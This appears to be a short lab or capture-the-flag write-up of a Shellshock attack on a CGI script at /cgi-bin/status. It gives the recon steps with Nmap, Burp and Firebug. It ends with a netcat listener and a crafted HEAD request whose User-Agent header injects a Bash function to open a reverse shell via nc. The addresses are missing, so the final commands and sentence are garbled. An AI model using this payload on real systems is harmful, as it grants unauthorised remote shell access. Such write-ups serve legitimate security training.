So it is said that if you know your enemies and know yourself, you will not be put at risk even if you have a hundred battles. —– The Art of War

This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Difficluty: 1/5


  • Nmap
  • Burp
  • Firebug
  • NC

Detail Assessment and Planning

  • Port scan to identify opened ports, running services and services version. —-Nmap
  • Identify vulnerability and path /cgi-bin/status. —-Burp, Firebug
  • Exploit shellshock vuln get the reverse shell —- NC

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

By visiting the application with Burp, I can detect that multiple URL are accessed when the page is loaded:

Also by using Firebug, I can identify that CGI page which call system command /cgi-bin/status


listen port 443

# nc -l -p 443

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 443 -e /bin/sh\r\nHost:\r\nConnection: close\r\n\r\n" | nc 80 is the attacker’s machine and is victim machine.